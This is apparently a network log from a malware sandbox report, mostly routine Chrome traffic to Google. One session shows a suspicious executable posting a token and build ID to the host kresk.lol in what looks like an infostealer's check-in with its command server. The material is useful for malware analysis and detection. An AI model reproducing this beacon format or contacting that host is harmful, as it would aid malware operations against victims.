2024-12-04 16:04:44 UTC | 1390              | IN        | Data Raw: 70 65 64 20 32 30 32 34 20 61 72 74 69 73 74 73 22 2c 22 74 72 65 76 6f 72 20 6c 61 77 72 65 6e 63 65 20 74 65 78 61 6e 73 22 2c 22 70 6c 61 79 73 74 61 74 69 6f 6e 20 70 73 35 20 33 30 74 68 20 61 6e 6e 69 76 65 72 73 61 72 79 22 2c 22 63 68 69 6e 61 20 62 61 6e 73 20 65 78 70 6f 72 74 73 22 2c 22 73 6b 65 6c 65 74 6f 6e 20 63 72 65 77 20 73 74 61 72 20 77 61 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f
Data Ascii: ped 2024 artists","trevor lawrence texans","playstation ps5 30th anniversary","china bans exports","skeleton crew star wars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
2024-12-04 16:04:44 UTC | 1390              | IN        | Data Raw: 47 62 47 74 30 52 6d 35 4f 53 47 46 6f 56 55 56 68 5a 31 5a 77 4e 57 5a 6e 56 47 67 77 65 6e 70 4b 53 30 39 78 65 6c 42 4e 57 45 63 7a 5a 7a 42 6f 51 56 46 7a 4d 48 6c 42 54 32 46 4f 56 32 74 44 52 58 46 4a 63 31 5a 49 64 6b 46 47 61 6a 4e 33 62 31 70 73 61 33 68 76 4e 6d 78 32 55 58 52 54 4d 6b 68 46 53 6c 64 47 54 30 52 54 59 6d 6f 7a 51 58 42 54 56 45 56 4c 4d 55 70 70 56 48 4e 69 4e 45 5a 59 54 6a 56 4c 4d 48 4e 77 55 32 78 33 55 56 4a 36 55 48 5a 73 55 6b 64 76 56 45 34 33 4d 33 5a 6c 4c 31 68 42 4e 31 68 4f 63 47 46 79 62 56 56 6b 55 54 51 79 56 79 39 6b 53 30 5a 46 59 56 51 30 4b 32 59 32 57 56 42 61 59 6d 4a 69 52 6a 49 78 63 6c 4a 78 4d 43 73 77 5a 45 6c 4b 61 6d 46 4f 63 30 52 56 65 6d 4a 69 54 31 6c 56 5a 46 45 32 62 32 68 44 53 44 42 4d 57 44
Data Ascii: GbGt0Rm5OSGFoVUVhZ1ZwNWZnVGgwenpKS09xelBNWEczZzBoQVFzMHlBT2FOV2tDRXFJc1ZIdkFGajN3b1psa3hvNmx2UXRTMkhFSldGT0RTYmozQXBTVEVLMUppVHNiNEZYTjVLMHNwU2x3UVJ6UHZsUkdvVE43M3ZlL1hBN1hOcGFybVVkUTQyVy9kS0ZFYVQ0K2Y2WVBaYmJiRjIxclJxMCswZElKamFOc0RVemJiT1lVZFE2b2hDSDBMWD
2024-12-04 16:04:44 UTC | 257               | IN        | Data Raw: 48 56 56 61 6c 5a 4e 4b 30 4e 45 4d 48 52 43 56 6b 56 52 53 58 64 79 5a 48 46 47 65 47 78 48 54 7a 5a 72 59 6c 68 46 4e 58 70 49 61 47 31 74 62 33 4d 33 52 6c 5a 56 63 46 63 7a 63 48 42 44 5a 31 52 35 65 57 77 78 56 58 56 46 4d 6b 39 33 51 31 6b 32 61 6c 5a 6a 55 55 31 59 52 45 64 6c 4d 48 4a 79 61 6e 56 52 57 6d 4a 73 54 6c 45 77 4d 56 56 51 53 57 45 31 4e 33 4a 78 51 7a 4e 36 5a 30 77 72 65 55 6c 42 54 6e 42 4e 61 32 56 45 61 57 6c 35 5a 6b 35 78 5a 45 64 69 4d 48 70 31 57 6a 5a 44 64 7a 42 6b 55 32 52 6c 65 56 46 4f 5a 31 52 32 52 57 35 43 4f 55 78 34 51 6c 46 32 64 56 56 75 4d 44 4e 70 64 57 78 6b 53 7a 5a 61 59 6a 64 6a 59 7a 5a 56 61 30 45 7a 52 56 4a 4e 52 46 52 5a 4f 55 70 74 4b 30 31 33 62 7a 5a 6f 52 33 68 31 55 54 55 76 57 45 35 57 56 45 4e 75
Data Ascii: HVValZNK0NEMHRCVkVRSXdyZHFGeGxHTzZrYlhFNXpIaG1tb3M3RlZVcFczcHBDZ1R5eWwxVXVFMk93Q1k2alZjUU1YREdlMHJyanVRWmJsTlEwMVVQSWE1N3JxQzN6Z0wreUlBTnBNa2VEaWl5Zk5xZEdiMHp1WjZDdzBkU2RleVFOZ1R2RW5COUx4QlF2dVVuMDNpdWxkSzZaYjdjYzZVa0EzRVJNRFRZOUptK013bzZoR3h1UTUvWE5WVENu
2024-12-04 16:04:44 UTC | 90                | IN        | Data Raw: 35 34 0d 0a 54 31 70 79 62 56 4a 6d 64 32 51 30 55 47 64 42 4c 33 5a 33 59 30 70 35 56 6e 52 75 54 56 64 50 5a 46 5a 70 62 6c 52 36 61 30 5a 55 4e 46 52 79 4e 56 45 78 5a 6d 52 48 4f 57 39 74 53 54 64 6b 53 55 39 4d 51 6a 6b 32 62 31 45 32 56 32 46 6f 59 56 68 47 0d 0a
Data Ascii: 54T1pybVJmd2Q0UGdBL3Z3Y0p5VnRuTVdPZFZpblR6a0ZUNFRyNVExZmRHOW9tSTdkSU9MQjk2b1E2V2FoYVhG
2024-12-04 16:04:44 UTC | 1231              | IN        | Data Raw: 34 63 38 0d 0a 4d 48 70 35 4d 47 68 54 56 55 70 55 4f 57 39 6e 65 45 46 46 61 56 46 45 4c 30 46 4f 64 30 70 73 63 6d 46 59 63 7a 4a 35 4d 57 68 35 56 6d 63 78 59 6c 4e 4a 54 6d 64 4b 59 30 56 70 54 44 6c 36 4c 32 4a 45 54 32 4a 46 55 6c 4a 56 51 32 46 43 57 57 4d 31 63 6d 6c 5a 56 56 4e 52 63 45 74 72 55 6b 4a 72 4f 55 39 6f 62 6a 51 79 4f 46 6c 69 64 55 5a 6c 55 6c 56 43 4d 57 77 77 54 46 64 33 62 32 70 58 52 32 6c 4f 59 56 4a 30 53 54 5a 55 54 69 39 51 57 47 4d 30 56 48 4d 78 59 6e 41 32 56 33 4e 59 56 45 30 31 61 55 74 30 51 30 4e 56 4b 32 39 68 55 31 46 6e 4c 32 6c 53 53 69 39 4f 4c 30 55 33 62 56 52 4d 54 54 42 6c 62 30 30 79 55 6c 55 31 54 6e 4a 53 63 48 4e 73 52 48 4e 49 56 55 52 31 52 6d 51 76 4f 45 52 79 61 6e 68 35 53 55 64 77 4e 6b 46 58 57 6e
Data Ascii: 4c8MHp5MGhTVUpUOW9neEFFaVFEL0FOd0pscmFYczJ5MWh5VmcxYlNJTmdKY0VpTDl6L2JET2JFUlJVQ2FCWWM1cmlZVVNRcEtrUkJrOU9objQyOFlidUZlUlVCMWwwTFd3b2pXR2lOYVJ0STZUTi9QWGM0VHMxYnA2V3NYVE01aUt0Q0NVK29hU1FnL2lSSi9OL0U3bVRMTTBlb00yUlU1TnJScHNsRHNIVUR1RmQvOERyanh5SUdwNkFXWn
2024-12-04 16:04:44 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.4 | 49750       | 142.250.181.68 | 443              | 5020 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:04:43 UTC | 353               | OUT       | GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.4 | 49746       | 142.250.181.68 | 443              | 5020 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:04:43 UTC | 518               | OUT       | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-04 16:04:44 UTC | 1018              | IN        | HTTP/1.1 200 OK
Version: 702228742
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Wed, 04 Dec 2024 16:04:44 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-04 16:04:44 UTC | 372               | IN        | Data Raw: 31 65 34 37 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
Data Ascii: 1e47)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-04 16:04:44 UTC | 1390              | IN        | Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-04 16:04:44 UTC | 1390              | IN        | Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-04 16:04:44 UTC | 1390              | IN        | Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 38 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77
                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700308,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window
                                                                                                                                                                      2024-12-04 16:04:44 UTC437INData Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73
                                                                                                                                                                      Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this
                                                                                                                                                                      2024-12-04 16:04:44 UTC371INData Raw: 31 36 63 0d 0a 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5f 2e 4a 64 3f 5f 2e 4a 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 53 64 2c
                                                                                                                                                                      Data Ascii: 16c\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Od\u003dnew _.Nd(_.Jd?_.Jd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Sd,
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 38 30 30 30 0d 0a 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 52 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75
                                                                                                                                                                      Data Ascii: 8000if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};Sd\u003dfunction(){let a\u003dnull;if(!Rd)return a;try{const b\u003dc\u003d\u
                                                                                                                                                                      2024-12-04 16:04:44 UTC1390INData Raw: 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 52 64 5c 75 30 30 33 64 5f 2e 4a 64 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 59 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e
                                                                                                                                                                      Data Ascii: ,c)};_.ee\u003dfunction(a,b,c\u003d0){return _.vb(_.S(a,b),c)};_.ge\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Rd\u003d_.Jd;_.Vd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Yd\u003d/^\\s*(?!javascript:)(?:[\\w+.


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 142.250.181.68 | Destination Port: 443 | PID: 5020 | Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:43 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-04 16:04:44 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 702228742
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Wed, 04 Dec 2024 16:04:44 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-04 16:04:44 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a | Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-04 16:04:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 159.69.102.165 | Destination Port: 443 | PID: 8080 | Process: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:48 UTC | 316 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CB1DTR9ZC2V37Q1VKXBS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:04:48 UTC | 505 | OUT | Data Ascii: ------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------CB1DTR9ZC2V37Q1VKXBSCont
2024-12-04 16:04:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:04:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:04:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2ok0


